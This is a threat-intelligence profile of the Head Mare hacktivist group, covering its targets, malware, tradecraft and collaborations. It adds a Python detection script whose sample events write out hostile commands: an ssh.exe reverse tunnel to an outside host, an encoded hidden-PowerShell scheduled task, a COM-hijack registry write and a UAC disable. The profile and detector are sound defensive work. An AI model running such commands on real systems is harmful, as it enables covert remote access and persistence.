Head Mare
Head Mare is a pro-Ukrainian hacktivist threat group active since at least 2023 that targets Russian and Belarusian organizations. Reported victim sectors include government, logistics, finance, industry, construction, manufacturing, education, science, and other commercial organizations in Russia, as well as Belarusian targets. The group has been linked to phishing-led intrusions and to exploitation of newly disclosed vulnerabilities, including the TrueConf Server vulnerability BDU:2025-10114 and the NTLM hash-leak vulnerability CVE-2024-43451.

Head Mare is known for custom malware including PhantomCore, PhantomDL, PhantomHeart, and PhantomProxyLite. PhantomCore and PhantomDL have been delivered through phishing campaigns using password-protected archives containing disguised .lnk or .url files, with decoy documents and PowerShell loaders. In a February 2026 campaign, a new C++ PhantomCore variant provided remote shell access, used JSON over HTTP POST for C2, and was paired with a Golang utility, TemplateMaintenanceHost.exe, that launched the built-in Windows ssh.exe client to create reverse tunnels, enabling proxying into victim local networks. Observed persistence included PSFactoryBuffer COM hijacking and scheduled tasks.

In late 2025 and early 2026, Head Mare introduced PhantomHeart, first as a DLL and later as a PowerShell implementation, reflecting increased living-off-the-land tradecraft. PhantomHeart communicates with C2 over HTTP, registers infected hosts with system metadata, and can establish SSH tunnels via OpenSSH remote port forwarding. Head Mare also reimplemented PhantomProxyLite in PowerShell, persisted it via scheduled tasks, and used helper tooling such as adduser.exe to create a local administrator account and disable UAC. Additional tools observed alongside Head Mare activity include MicroSocks, Mimikatz, Advanced Port Scanner, LockBit samples, and Sliver.
The group heavily uses SSH tunneling and native Windows/OpenSSH components for persistence, remote access, and lateral movement. Reported techniques include phishing with malicious archives and shortcut files, PowerShell loaders, COM hijacking, scheduled-task persistence, reverse SSH tunnels, SOCKS proxying, credential theft and post-exploitation with Impacket tooling, and exploitation of NTLM weaknesses for hash leakage and follow-on movement.

Reporting also notes operational overlap or collaboration with other pro-Ukrainian groups. Head Mare has likely joined forces with Twelve to target Russian entities. Kaspersky reported coordination with BO Team, including overlapping infrastructure and a possible division of labor in which Head Mare gains initial access through phishing and BO Team conducts follow-on malware deployment. F6 also reported collaboration between Bearlyfy and Head Mare. Separate reporting noted some infrastructure and directory overlaps with Cloud Atlas, including PhantomHeart-related SSH tunneling artifacts, but concluded that the TTPs remain distinct.

Known aliases: Head Mare, head_mare.
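As an added example (not the page's, Mallory's, or any vendor's code), the following Python triage script turns four of the tradecraft points above into detection rules and runs them over constructed, Sysmon-shaped events: an OpenSSH `ssh.exe -R` reverse tunnel, a CLSID InprocServer32 write in a user hive (the generic shape of COM hijacking; the PSFactoryBuffer CLSID itself is not reproduced here), `schtasks /create` launching hidden or encoded PowerShell, and EnableLUA set to 0. The event field names, the host 198.51.100.23, the SID, the CLSIDs, the paths, and the "DWORD (0x...)" details format are all assumptions made for the example, not observables from reporting.

```python
import re

# Constructed Sysmon-like events (assumed field names, not real telemetry).
# event_id 1 = process creation, event_id 13 = registry value set.
SAMPLE_EVENTS = [
    {"event_id": 1, "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Users\Public\TemplateMaintenanceHost.exe",
     "command_line": r"ssh.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 "
                     r"-o StrictHostKeyChecking=no -i C:\Users\Public\id_key svc@198.51.100.23"},
    {"event_id": 1, "user": r"CORP\jdoe",                       # benign interactive ssh use
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "ssh.exe jdoe@build01.corp.example"},
    {"event_id": 13, "user": r"CORP\jdoe",                      # user-hive CLSID server path
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_object": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Classes"
                      r"\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\(Default)",
     "details": r"C:\Users\jdoe\AppData\Roaming\update.dll"},
    {"event_id": 13, "user": r"NT AUTHORITY\SYSTEM",           # machine-hive write by an installer
     "image": r"C:\Windows\System32\msiexec.exe",
     "target_object": r"HKLM\SOFTWARE\Classes\CLSID\{22222222-3333-4444-5555-666666666666}"
                      r"\InprocServer32\(Default)",
     "details": r"C:\Program Files\Vendor\vendor.dll"},
    {"event_id": 1, "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks.exe /create /sc minute /mo 10 /tn Maintenance '
                     r'/tr "powershell.exe -w hidden -ep bypass -enc SQBFAFgA"'},
    {"event_id": 13, "user": r"BUILTIN\Administrators",
     "image": r"C:\Users\Public\adduser.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "details": "DWORD (0x00000000)"},
]


def reverse_ssh_tunnel(ev):
    """ssh.exe started with -R: a remote port forward back to the far host,
    the reverse-tunnel shape used for proxying into the victim network."""
    if ev["event_id"] != 1 or not ev["image"].lower().endswith(r"\ssh.exe"):
        return None
    cl = ev["command_line"]
    if not re.search(r"(?:^|\s)-R\s*\S+", cl):
        return None
    reasons = ["ssh -R remote port forward"]
    if re.search(r"(?:^|\s)-N\b", cl):
        reasons.append("-N (no remote command)")
    if re.search(r"StrictHostKeyChecking=no", cl, re.I):
        reasons.append("host-key checking disabled")
    return "reverse_ssh_tunnel", ", ".join(reasons)


# Per-user CLSID registrations (HKCU or HKU\<SID>) pointing at a server DLL/EXE:
# the generic COM-hijack shape; machine-hive writes are left to other rules.
CLSID_HIJACK = re.compile(
    r"^HK(?:CU|U\\[^\\]+)\\Software\\Classes\\CLSID\\\{[0-9a-f-]{36}\}\\(?:Inproc|Local)Server32",
    re.I)


def user_hive_com_hijack(ev):
    if ev["event_id"] != 13 or not CLSID_HIJACK.search(ev["target_object"]):
        return None
    return "user_hive_com_hijack", f"server path set to {ev['details']}"


def powershell_scheduled_task(ev):
    """schtasks /create whose action is hidden, bypassing, or encoded PowerShell."""
    if ev["event_id"] != 1 or not ev["image"].lower().endswith(r"\schtasks.exe"):
        return None
    cl = ev["command_line"]
    if not (re.search(r"/create\b", cl, re.I) and re.search(r"powershell|pwsh", cl, re.I)):
        return None
    if not re.search(r"-(?:e|ec|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|bypass", cl, re.I):
        return None
    return "powershell_scheduled_task", "schtasks /create launching hidden/encoded PowerShell"


def uac_disabled(ev):
    """EnableLUA written as 0 (details format 'DWORD (0x00000000)' is an assumption)."""
    if ev["event_id"] != 13 or not ev["target_object"].lower().endswith(r"\policies\system\enablelua"):
        return None
    if not re.search(r"\b0x0+\b|\b0\b", ev["details"]):
        return None
    return "uac_disabled", f"{ev['image']} set EnableLUA to {ev['details']}"


RULES = (reverse_ssh_tunnel, user_hive_com_hijack, powershell_scheduled_task, uac_disabled)


def triage(events):
    """Run every rule over every event; return one finding dict per hit."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append({"rule": hit[0], "user": ev["user"], "image": ev["image"], "why": hit[1]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['user']} {f['image']}: {f['why']}")
```

The benign interactive `ssh.exe` launch and the installer's HKLM CLSID write are deliberately left unflagged; in a real pipeline the parent process (here TemplateMaintenanceHost.exe) and the key path in a world-writable directory would raise the score of the first hit further.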
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Government & Administration
- Capital Goods
- Commercial & Professional Services
Where they target
Geographies tied to known operations.
- 🇷🇺 Russia
Tradecraft
22 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
8 malware families attributed to this actor across reporting.
Observables
100 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
12 sources tracked across advisories, community write-ups, and news.
- Referenced as a separate threat actor whose recent activity overlaps with Cloud Atlas infrastructure patterns; associated here with the PhantomHeart backdoor used to create SSH tunnels.
- Threat group targeting Russian and Belarusian organizations, likely coordinating with BO Team, using phishing for initial access, custom malware, and exploitation of newly disclosed vulnerabilities.
- Named threat actor that reportedly collaborated with Bearlyfy.
- A more experienced pro-Ukrainian group observed collaborating with Bearlyfy.